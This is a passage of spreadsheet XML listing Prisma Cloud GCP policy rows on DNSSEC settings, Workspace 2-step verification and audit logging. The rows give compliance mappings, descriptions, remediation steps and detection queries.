          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2907" t="inlineStr">
        <is>
          <t>PC-GCP-DNS-210</t>
        </is>
      </c>
      <c r="AD2907" t="b">
        <v>1</v>
      </c>
      <c r="AE2907" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2907" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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7" t="inlineStr">
        <is>
          <t>30267b28-b4c3-45f5-b6a9-307b61241ed7</t>
        </is>
      </c>
      <c r="AI2907" t="inlineStr">
        <is>
          <t>ffbc6c7b-5f72-4fa8-bd56-63397a7c80ea</t>
        </is>
      </c>
      <c r="AJ2907" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2907" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2908">
      <c r="A2908" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, Brazilian Data Protection Law (LGPD), ISO/IEC 27017:2015, CIS Controls v8.1, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, CIS v2.0.0 (GCP) Level 1, PCI DSS v4.0, NIST SP 800-172, CIS v1.3.0 (GCP), CIS v1.2.0 (GCP), ISO/IEC 27017:2015, CSA CCM v.4.0.6, CSA CCM v.4.0.1, Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.1.02, ISO/IEC 27017:2015, ISO 27001:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.6, Rehan, CIS v1.1.0 (GCP), Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, Copy of CIS Controls v8, CIS Controls v7.1, PCI DSS v4.0, ISO 27001:2013, NIST CSF, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, ISO 27002:2022, CSA CCM v.4.0.1, NIST SP 800-171 Revision 3, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, APRA (CPS 234) Information Security, TX-RAMP Level 1, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST v.9.4.2 [Deprecated], ISO/IEC 27001:2022, ISO 27001:2013, ITSG-33, TX-RAMP Level 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v8, CCPA 2018, ISO/IEC 27001:2022, PIPEDA, CRI Profile v1.2.1, ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, CIS v3.0.0 (GCP) Level 1, Sarbanes Oxley Act (SOX), NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, PCI DSS v4.0, CSA CCM v.4.0.1, ISO/IEC 27018:2019, CIS v1.0.0 (GCP), FFIEC</t>
        </is>
      </c>
      <c r="B2908" s="2" t="inlineStr">
        <is>
          <t>MAYBE</t>
        </is>
      </c>
      <c r="C2908" s="2" t="inlineStr"/>
      <c r="D2908" t="n">
        <v>0</v>
      </c>
      <c r="E2908" t="n">
        <v>10</v>
      </c>
      <c r="F2908" t="n">
        <v>0</v>
      </c>
      <c r="G2908" t="b">
        <v>1</v>
      </c>
      <c r="H29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8" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2908" t="inlineStr">
        <is>
          <t>gcloud-dns</t>
        </is>
      </c>
      <c r="K2908" t="inlineStr">
        <is>
          <t>GCP Cloud DNS has DNSSEC disabled</t>
        </is>
      </c>
      <c r="L2908" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2908" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2908" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2908" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2908" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2908" t="inlineStr">
        <is>
          <t>Guidelines for Networking</t>
        </is>
      </c>
      <c r="R2908" t="inlineStr">
        <is>
          <t>ISM-1782</t>
        </is>
      </c>
      <c r="S2908" t="inlineStr"/>
      <c r="T2908" t="b">
        <v>0</v>
      </c>
      <c r="U2908" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2908" t="inlineStr">
        <is>
          <t>gcloud-dns-managed-zone</t>
        </is>
      </c>
      <c r="W2908" t="inlineStr">
        <is>
          <t>This policy identifies GCP Cloud DNS which has DNSSEC disabled. Domain Name System Security Extensions (DNSSEC) adds security to the Domain Name System (DNS) protocol by enabling DNS responses to be validated. Attackers can hijack the process of domain/IP lookup and redirect users to a malicious site through DNS hijacking and man-in-the-middle attacks. DNSSEC helps mitigate the risk of such attacks by cryptographically signing DNS records. As a result, it prevents attackers from issuing fake DNS responses that may misdirect browsers to fake websites.</t>
        </is>
      </c>
      <c r="X2908" t="inlineStr">
        <is>
          <t>1. Login to GCP portal 
2. Go to Network services
3. Choose Cloud DNS
4. Click on reported Cloud DNS / Zone name
5. Under 'DNSSEC' column choose 'On' from the drop-down 
Build Recommendation: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5
IaC: Refer the documentation for more details,
https://docs.prismacloud.io/en/enterprise-edition/policy-reference/google-cloud-policies/google-cloud-networking-policies/bc-gcp-networking-5</t>
        </is>
      </c>
      <c r="Y2908" t="inlineStr"/>
      <c r="Z2908" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-dns-managed-zone' AND json.rule = '(dnssecConfig.state does not exist or dnssecConfig.state equals off) and visibility equals public'
{"category":"Networking","resourceTypes":["google_dns_managed_zone"]}</t>
        </is>
      </c>
      <c r="AA2908" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2908" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2908" t="inlineStr">
        <is>
          <t>PC-GCP-DNS-170-CKV_GCP_16</t>
        </is>
      </c>
      <c r="AD2908" t="b">
        <v>1</v>
      </c>
      <c r="AE2908" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2908" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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8" t="inlineStr">
        <is>
          <t>3fe0c24e-7e74-44b3-bbda-b3e68fb55f6c</t>
        </is>
      </c>
      <c r="AI2908" t="inlineStr">
        <is>
          <t>72a4b096-a34b-4a22-a77c-3f38cdbcf986</t>
        </is>
      </c>
      <c r="AJ2908" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2908" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2909">
      <c r="A2909" t="inlineStr">
        <is>
          <t>PCI DSS v4.0, ISO/IEC 27017:2015, CIS Controls v8.1, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), APRA (CPS 234) Information Security, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-172, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CSA CCM v.4.0.6, CSA CCM v.4.0.1, CIS v1.3.0 (GCP), Copy of ACSC Information Security Manual (ISM)-clone, APRA (CPS 234) Information Security, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), CIS v3.0.0 (GCP) Level 1, ISO/IEC 27017:2015, ISO 27001:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.6, CIS v1.1.0 (GCP), New Zealand Information Security Manual (NZISM v3.4), Secure Controls Framework (SCF) - 2024.2, Copy of CIS Controls v8, CIS Controls v7.1, CIS v2.0.0 (GCP) Level 1, ISO 27001:2013, NIST CSF, ISO 27001:2013, kashan ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2024.2, ISO/IEC 27017:2015, ISO 27002:2022, Rehan, CSA CCM v.4.0.1, Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), NIST SP 800-171 Revision 3, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, CSA CCM v.4.0.1, Microsoft Cloud Security Benchmark v1, Insurance Regulatory And Development Authority Of India, kfirdaus AWS Account-CS, ISO/IEC 27002:2013, PCI DSS v4.0, PCI DSS v4.0, PCI DSS v3.2.1, ISO/IEC 27002:2013, ISO/IEC 27017:2015, CSA CCM v.4.0.1, ISO/IEC 27002:2013, CSA CCM v.4.0.1, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, APRA (CPS 234) Information Security, CSA CCM v4.0.12, RBI Baseline Cyber Security and Resilience Requirements, HITRUST v.9.4.2 [Deprecated], Cybersecurity Maturity Model Certification (CMMC) v.1.02, ITSG-33, PCI DSS v4.0, TX-RAMP Level 2, APRA (CPS 234) Information Security, ISO/IEC 27002:2013, CIS Controls v8, CCPA 2018, ISO/IEC 27001:2022, PIPEDA, CRI Profile v1.2.1, CIS v1.2.0 (GCP), Cybersecurity Maturity Model Certification (CMMC) v.2.0 (Level 2), Brazilian Data Protection Law (LGPD), ACSC Information Security Manual (ISM), Secure Controls Framework (SCF) - 2022.2.1, Sarbanes Oxley Act (SOX), CIS v1.0.0 (GCP), NIST SP 800-171 Revision 2, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST SP 800-172, CSA CCM v.4.0.1, CSA CCM v.4.0.1, PCI DSS v4.0, Copy of New Zealand Information Security Manual (NZISM v3.4), ISO/IEC 27018:2019, FFIEC</t>
        </is>
      </c>
      <c r="B2909" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2909" s="2" t="inlineStr"/>
      <c r="D2909" t="inlineStr"/>
      <c r="E2909" t="inlineStr"/>
      <c r="F2909" t="inlineStr"/>
      <c r="G2909" t="b">
        <v>0</v>
      </c>
      <c r="H29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09" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2909" t="inlineStr">
        <is>
          <t>gcloud-dns</t>
        </is>
      </c>
      <c r="K2909" t="inlineStr">
        <is>
          <t>GCP Cloud DNS zones using RSASHA1 algorithm for DNSSEC key-signing</t>
        </is>
      </c>
      <c r="L2909" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2909" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2909" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2909" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2909" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2909" t="inlineStr">
        <is>
          <t>10</t>
        </is>
      </c>
      <c r="R2909" t="inlineStr">
        <is>
          <t>10.8</t>
        </is>
      </c>
      <c r="S2909" t="inlineStr"/>
      <c r="T2909" t="b">
        <v>0</v>
      </c>
      <c r="U2909" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2909" t="inlineStr">
        <is>
          <t>gcloud-dns-managed-zone</t>
        </is>
      </c>
      <c r="W2909" t="inlineStr">
        <is>
          <t>This policy identifies the GCP Cloud DNS zones which are using the RSASHA1 algorithm for DNSSEC key-signing. DNSSEC is a feature of the Domain Name System that authenticates responses to domain name lookups and also prevents attackers from manipulating or poisoning the responses to DNS requests. So the algorithm used for key signing should be recommended one and it should not be weak.</t>
        </is>
      </c>
      <c r="X2909" t="inlineStr">
        <is>
          <t>Currently, DNSSEC key-signing can be updated using command line interface only.
1. If you need to change the settings for a managed zone where it has been enabled, you have to turn DNSSEC off and then re-enable it with different settings. To turn off DNSSEC, run following command:
gcloud dns managed-zones update &lt;ZONE_NAME&gt; --dnssec-state off
2. To update key-signing for a reported managed DNS Zone, run following command:
gcloud dns managed-zones update &lt;ZONE_NAME&gt; --dnssec-state on --ksk-algorithm &lt;KSK_ALGORITHM&gt; --ksk-key-length &lt;KSK_KEY_LENGTH&gt; --zsk-algorithm &lt;ZSK_ALGORITHM&gt; --zsk-key-length &lt;ZSK_KEY_LENGTH&gt; --denial-of-existence &lt;DENIAL_OF_EXISTENCE&gt;</t>
        </is>
      </c>
      <c r="Y2909" t="inlineStr"/>
      <c r="Z2909" t="inlineStr">
        <is>
          <t>config from cloud.resource where cloud.type = 'gcp' AND api.name = 'gcloud-dns-managed-zone' AND json.rule = 'dnssecConfig.defaultKeySpecs[*].keyType contains keySigning and dnssecConfig.defaultKeySpecs[*].algorithm contains rsasha1'</t>
        </is>
      </c>
      <c r="AA2909" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2909" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2909" t="inlineStr">
        <is>
          <t>PC-GCP-DNS-209</t>
        </is>
      </c>
      <c r="AD2909" t="b">
        <v>1</v>
      </c>
      <c r="AE2909" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2909" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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09" t="inlineStr">
        <is>
          <t>f828325a-6bc0-4f37-8cb6-757949fb433b</t>
        </is>
      </c>
      <c r="AI2909" t="inlineStr">
        <is>
          <t>dba7e15a-9bfb-4faa-bc9d-f80ce00034fa</t>
        </is>
      </c>
      <c r="AJ2909" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2909" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2910">
      <c r="A2910" t="inlineStr">
        <is>
          <t>TX-RAMP Level 1, TX-RAMP Level 1, CSA CCM v4.0.12, HITRUST CSF v.11.2.0, TX-RAMP Level 2, NYDFS 23 CRR-NY 500.0, HITRUST CSF v.11.2.0, CIS Controls v8.1, NYDFS 23 CRR-NY 500.0, CSA CCM v4.0.12, ITSG-33, TX-RAMP Level 2, Microsoft Cloud Security Benchmark v1</t>
        </is>
      </c>
      <c r="B2910" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2910" s="2" t="inlineStr"/>
      <c r="D2910" t="inlineStr"/>
      <c r="E2910" t="inlineStr"/>
      <c r="F2910" t="inlineStr"/>
      <c r="G2910" t="b">
        <v>1</v>
      </c>
      <c r="H29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10" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2910" t="inlineStr">
        <is>
          <t>gcloud-domain</t>
        </is>
      </c>
      <c r="K2910" t="inlineStr">
        <is>
          <t>GCP Google Workspace User not enrolled with 2-step verification</t>
        </is>
      </c>
      <c r="L2910" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2910" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N2910" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2910" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2910" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2910" t="inlineStr">
        <is>
          <t>IM</t>
        </is>
      </c>
      <c r="R2910" t="inlineStr">
        <is>
          <t>IM-6</t>
        </is>
      </c>
      <c r="S2910" t="inlineStr"/>
      <c r="T2910" t="b">
        <v>0</v>
      </c>
      <c r="U2910" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2910" t="inlineStr">
        <is>
          <t>gcloud-domain-users</t>
        </is>
      </c>
      <c r="W2910" t="inlineStr">
        <is>
          <t>This policy identifies Google Workspace Users who do not have 2-Step Verification enabled. 
Enabling 2-Step Verification for Google Workspace users significantly enhances account security by adding an additional layer of authentication beyond just passwords. This reduces the risk of unauthorized access, protects sensitive data, and ensures compliance with security best practices. Implementing this measure strengthens overall organizational security and helps safeguard against potential cyber threats.
It is recommended to enable 2-Step Verification for all users as it provides increased security for user account settings and resources.</t>
        </is>
      </c>
      <c r="X2910" t="inlineStr">
        <is>
          <t>Workspace users should be allowed to turn on 2-Step verification (2SV) before enabling 2SV. Follow the steps mentioned below to allow users to turn on 2SV.
1. Sign in to Workspace Admin Console with an administrator account. 
2. Go to Menu then 'Security' &gt; 'Authentication' &gt; '2-step verification'.
3. Check the 'Allow users to turn on 2-Step Verification' box.
4. Select 'Enforcement' as per need.
5. Click Save.
For more details, please refer to below URL:
https://support.google.com/a/answer/9176657
To enable 2-Step Verification for GCP Workspace User accounts, follow the steps below.
1. Open your Google Account.
2. In the navigation panel, select 'Security'.
3. Under 'How you sign in to Google', select '2-Step Verification' &gt; 'Get started'.
4. Follow the on-screen steps.
For more details, please refer to below URL:
https://support.google.com/accounts/answer/185839</t>
        </is>
      </c>
      <c r="Y2910" t="inlineStr"/>
      <c r="Z2910" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-domain-users' AND json.rule = isAdmin is false and isEnrolledIn2Sv is false and archived is false and suspended is false</t>
        </is>
      </c>
      <c r="AA2910" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2910" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2910" t="inlineStr">
        <is>
          <t>PC-GCP-GW-919</t>
        </is>
      </c>
      <c r="AD2910" t="b">
        <v>1</v>
      </c>
      <c r="AE2910" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2910" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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10" t="inlineStr">
        <is>
          <t>5c58c32f-197f-47b0-9879-494599655e57</t>
        </is>
      </c>
      <c r="AI2910" t="inlineStr">
        <is>
          <t>14f6ee3b-ca59-41e2-8151-aca27a26d354</t>
        </is>
      </c>
      <c r="AJ2910" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2910" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2911">
      <c r="A2911" t="inlineStr">
        <is>
          <t>Microsoft Cloud Security Benchmark v1, Microsoft Cloud Security Benchmark v1, ITSG-33, TX-RAMP Level 2, Insurance Regulatory And Development Authority Of India, CSA CCM v4.0.12, NIST 800-53 Rev 5</t>
        </is>
      </c>
      <c r="B2911" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2911" s="2" t="inlineStr"/>
      <c r="D2911" t="inlineStr"/>
      <c r="E2911" t="inlineStr"/>
      <c r="F2911" t="inlineStr"/>
      <c r="G2911" t="b">
        <v>1</v>
      </c>
      <c r="H29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11" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2911" t="inlineStr">
        <is>
          <t>gcloud-domain</t>
        </is>
      </c>
      <c r="K2911" t="inlineStr">
        <is>
          <t>GCP Google Workspace Super Admin not enrolled with 2-step verification</t>
        </is>
      </c>
      <c r="L2911" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2911" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N2911" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2911" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2911" t="inlineStr">
        <is>
          <t>run</t>
        </is>
      </c>
      <c r="Q2911" t="inlineStr">
        <is>
          <t>AC</t>
        </is>
      </c>
      <c r="R2911" t="inlineStr">
        <is>
          <t>Account Management | Privileged User Accounts</t>
        </is>
      </c>
      <c r="S2911" t="inlineStr">
        <is>
          <t>Prisma_Cloud</t>
        </is>
      </c>
      <c r="T2911" t="b">
        <v>0</v>
      </c>
      <c r="U2911" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2911" t="inlineStr">
        <is>
          <t>gcloud-domain-users</t>
        </is>
      </c>
      <c r="W2911" t="inlineStr">
        <is>
          <t>This policy identifies Google Workspace Super Admins that do not have 2-Step Verification enabled. 
Super Admin accounts have access to all features in the Admin console and Admin API. This additional layer of 2SV significantly reduces the risk of unauthorized access, protecting administrative controls and sensitive data from potential breaches. Implementing 2-Step Verification safeguards your entire Google Workspace environment, maintaining robust security and compliance standards.
It is recommended to enable 2-Step Verification for all Super Admins as it provides an additional layer of security in case account credentials are compromised.</t>
        </is>
      </c>
      <c r="X2911" t="inlineStr">
        <is>
          <t>Workspace users should be allowed to turn on 2-Step verification (2SV) before enabling 2SV. Follow the steps mentioned below to allow users to turn on 2SV.
1. Sign in to Workspace Admin Console with an administrator account. 
2. Go to Menu then 'Security' &gt; 'Authentication' &gt; '2-step verification'.
3. Check the 'Allow users to turn on 2-Step Verification' box.
4. Select 'Enforcement' as per need.
5. Click Save.
For more details, please refer to below URL:
https://support.google.com/a/answer/9176657
To enable 2-Step Verification for GCP Workspace User accounts, follow the steps below.
1. Open your Google Account.
2. In the navigation panel, select 'Security'.
3. Under 'How you sign in to Google', select '2-Step Verification' &gt; 'Get started'.
4. Follow the on-screen steps.
For more details, please refer to below URL:
https://support.google.com/accounts/answer/185839</t>
        </is>
      </c>
      <c r="Y2911" t="inlineStr"/>
      <c r="Z2911" t="inlineStr">
        <is>
          <t>config from cloud.resource where api.name = 'gcloud-domain-users' AND json.rule = isAdmin is true and isEnrolledIn2Sv is false and archived is false and suspended is false</t>
        </is>
      </c>
      <c r="AA2911" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB2911" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC2911" t="inlineStr">
        <is>
          <t>PC-GCP-GW-918</t>
        </is>
      </c>
      <c r="AD2911" t="b">
        <v>1</v>
      </c>
      <c r="AE2911" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF2911" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG29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11" t="inlineStr">
        <is>
          <t>7da8875d-2351-4e92-8332-77b2d221eb10</t>
        </is>
      </c>
      <c r="AI2911" t="inlineStr">
        <is>
          <t>9e009f43-1337-41b3-8cae-82de8c095c54</t>
        </is>
      </c>
      <c r="AJ2911" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK2911" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:03</t>
        </is>
      </c>
    </row>
    <row r="2912">
      <c r="A2912" t="inlineStr">
        <is>
          <t>ISO/IEC 27002:2013, RBI Baseline Cyber Security and Resilience Requirements, jneytchev-fedramp-low, Brazilian Data Protection Law (LGPD), Sarbanes Oxley Act (SOX), CIS v1.2.0 (GCP), APRA (CPS 234) Information Security, PCI DSS v4.0, ISO/IEC 27017:2015, TX-RAMP Level 2, Telecommunications Security Act - TSA, Fedramp (Moderate), Risk Management in Technology (RMiT), Australian Energy Sector Cyber Security Framework (AESCSF), ISO/IEC 27002:2013, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, CIS v1.1.0 (GCP), ITSG-33, PCI DSS v4.0, NIST SP 800-171 Revision 3, PCI DSS v4.0, MITRE ATT&amp;CK v12, TX-RAMP Level 2, CSA CCM v.4.0.1, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, NYDFS 23 CRR-NY 500.0, ISO/IEC 27017:2015, Cybersecurity Maturity Model Certification (CMMC) v.1.02, Secure Controls Framework (SCF) - 2022.2.1, PCI DSS v3.2.1, CIS Controls v8, CSA CCM v.4.0.1, HITRUST CSF v.11.2.0, GDPR, ISO/IEC 27017:2015, CDC NIST 800-53 Rev4, Microsoft Cloud Security Benchmark v1, kfirdaus AWS Account-CS, CIS Controls v7.1, Microsoft Cloud Security Benchmark v1, ISO/IEC 27001:2022, ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, HITRUST CSF v.11.2.0, NIST 800-53 Rev 5, Secure Controls Framework (SCF) - 2024.2, PCI DSS v4.0, HITRUST v.9.4.2 [Deprecated], Insurance Regulatory And Development Authority Of India, ISO 27002:2022, TX-RAMP Level 1, NIST SP 800-171 Revision 2, NIST SP 800-171 Revision 3, Rehan, NIST 800-53 Rev 5, CDC NIST 800-53 Rev4, NIST SP 800-172, Copy of CIS Controls v8, PCI DSS v4.0, TX-RAMP Level 2, CIS v2.0.0 (GCP) Level 1, CIS v3.0.0 (GCP) Level 1, CSA CCM v4.0.12, Fedramp (Moderate), Copy of ACSC Information Security Manual (ISM)-clone, NIST 800-53 Rev 5, NIST 800-53 Rev 5, HITRUST v.9.4.2 [Deprecated], NIST 800-53 Rev4, RBI Baseline Cyber Security and Resilience Requirements, HITRUST CSF v.11.2.0, CIS v1.0.0 (GCP), Fedramp (Low), Copy of CIS Controls v8, Fedramp (Low), Brazilian Data Protection Law (LGPD), CSA CCM v.4.0.1, PCI DSS v4.0, PCI DSS v4.0, CIS Controls v8, jneytchev-fedramp-low, SEBI - Consolidated Cybersecurity and Cyber Resilience Framework (CSCRF), FFIEC, CSA CCM v.4.0.1, CIS Controls v8.1, PCI DSS v4.0, Risk Management in Technology (RMiT), Insurance Regulatory And Development Authority Of India, MITRE ATT&amp;CK v14.0 Cloud IaaS for Enterprise, Secure Controls Framework (SCF) - 2024.2, NIST 800-53 Rev4, CRI Profile v2.0, ISO 27002:2022, CIS v1.3.0 (GCP), kashan ACSC Information Security Manual (ISM), APRA (CPS 234) Information Security, CIS Controls v7.1, ISO/IEC 27002:2013, PCI DSS v4.0, Secure Controls Framework (SCF) - 2022.2.1, SOC 2, NIST CSF v2.0, APRA (CPS 234) Information Security, HIPAA, kfirdaus AWS Account-CS, PIPEDA, ITSG-33, NIST CSF, CDC NIST 800-53 Rev4, kashan ACSC Information Security Manual (ISM), PCI DSS v4.0, PCI DSS v4.0, Otoritas Jasa Keuangan (OJK) 38 POJK.03 2016, Fedramp (Moderate), CSA CCM v.4.0.6, NIST SP 800-171 Revision 3, ISO/IEC 27002:2013, NYDFS 23 CRR-NY 500.0, FFIEC, MITRE ATT&amp;CK v13.0 Cloud IaaS for Enterprise, CCPA 2018, MITRE ATT&amp;CK v10.0 [Deprecated], MITRE ATT&amp;CK v15.1 Cloud IaaS for Enterprise, CSA CCM v.4.0.6, CIS Controls v8.1, CSA CCM v4.0.12, CSA CCM v.4.0.6, NIST 800-53 Rev 5, Matt's ATT&amp;ACK, ISO/IEC 27001:2022, DORA, Copy of ACSC Information Security Manual (ISM)-clone, PCI DSS v3.2.1, Framework for Adoption of Cloud Services by SEBI Regulated Entities (REs), PCI DSS v4.0, Cybersecurity Maturity Model Certification (CMMC) v.1.02, NIST 800-53 Rev4</t>
        </is>
      </c>
      <c r="B2912" s="2" t="inlineStr">
        <is>
          <t>NO</t>
        </is>
      </c>
      <c r="C2912" s="2" t="inlineStr"/>
      <c r="D2912" t="inlineStr"/>
      <c r="E2912" t="inlineStr"/>
      <c r="F2912" t="inlineStr"/>
      <c r="G2912" t="b">
        <v>1</v>
      </c>
      <c r="H29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2" t="inlineStr">
        <is>
          <t>gcp</t>
        </is>
      </c>
      <c r="J2912" t="inlineStr">
        <is>
          <t>gcloud-iam</t>
        </is>
      </c>
      <c r="K2912" t="inlineStr">
        <is>
          <t>GCP Project audit logging is not configured properly across all services and all users in a project</t>
        </is>
      </c>
      <c r="L2912" t="inlineStr">
        <is>
          <t>MISCONFIGURATION</t>
        </is>
      </c>
      <c r="M2912" t="inlineStr">
        <is>
          <t>informational</t>
        </is>
      </c>
      <c r="N2912" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O2912" t="inlineStr">
        <is>
          <t>config</t>
        </is>
      </c>
      <c r="P2912" t="inlineStr">
        <is>
          <t>build,run</t>
        </is>
      </c>
      <c r="Q2912" t="inlineStr">
        <is>
          <t>Guidelines for System Monitoring</t>
        </is>
      </c>
      <c r="R2912" t="inlineStr">
        <is>
          <t>ISM-1228</t>
        </is>
      </c>
      <c r="S2912" t="inlineStr"/>
      <c r="T2912" t="b">
        <v>0</v>
      </c>
      <c r="U2912" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V2912" t="inlineStr">
        <is>
          <t>gcloud-iam-get-audit-config</t>
        </is>
      </c>
      <c r="W2912" t="inlineStr">
        <is>
          <t>This policy identifies the GCP projects in which cloud audit logging is not configured properly across all services and all users. It is recommended that cloud audit logging is configured to track all Admin activities and read, write access to user data. Logs should be captured for all users and there should be no exempted users in any of the audit config section.</t>
        </is>
      </c>
      <c r="X2912" t="inlineStr">
        <is>
          <t>1. To read the project's IAM policy and store it in a file run a command:
gcloud projects get-iam-policy [PROJECT_ID] &gt; /tmp/policy.yaml
2. Edit policy in /tmp/policy.yaml, adding or changing only the audit logs configuration to:
auditConfigs:
- auditLogConfigs:
 - logType: DATA_WRITE
 - logType: DATA_READ
service: allServices
